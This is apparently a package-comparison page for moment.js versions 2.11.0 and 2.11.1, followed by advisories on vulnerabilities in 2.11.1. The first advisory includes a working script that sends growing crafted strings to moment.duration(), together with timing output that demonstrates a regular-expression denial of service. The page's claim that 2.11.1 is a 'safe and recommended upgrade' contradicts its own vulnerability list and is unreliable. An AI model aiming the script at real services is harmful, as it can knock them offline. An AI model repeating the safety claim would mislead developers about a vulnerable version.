Moment.js, a widely used JavaScript library for date and time manipulation and formatting, saw a minor version update from 2.11.0 to 2.11.1 in early January 2016. Both versions share the same core functionality, offering developers robust tools for parsing, validating, manipulating, and displaying dates across various formats and timezones. Key features include flexible date parsing, comprehensive formatting options, and convenient date arithmetic.
Examining the package metadata, a developer might immediately notice that the devDependencies blocks remain largely identical between the two versions. This suggests that the update primarily focused on bug fixes and internal improvements rather than introducing new features or altering the existing API. The development dependencies listed, such as Grunt (for task automation), Karma (for testing), and UglifyJS (for minification), point to a well-maintained project with a strong emphasis on code quality and test coverage.
The most significant difference lies in the release dates. Version 2.11.0 was released on January 2nd, 2016, while version 2.11.1 followed shortly after, on January 9th, 2016. This short gap suggests that version 2.11.1 likely addresses critical bugs or regressions identified in version 2.11.0. Developers using older versions of Moment.js, or those who recently adopted 2.11.0, are advised to upgrade to 2.11.1 to benefit from the fixes and ensure stability. The author and other metadata remain the same, making this a safe and recommended upgrade for existing Moment.js users.
All the vulnerabilities related to the version 2.11.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: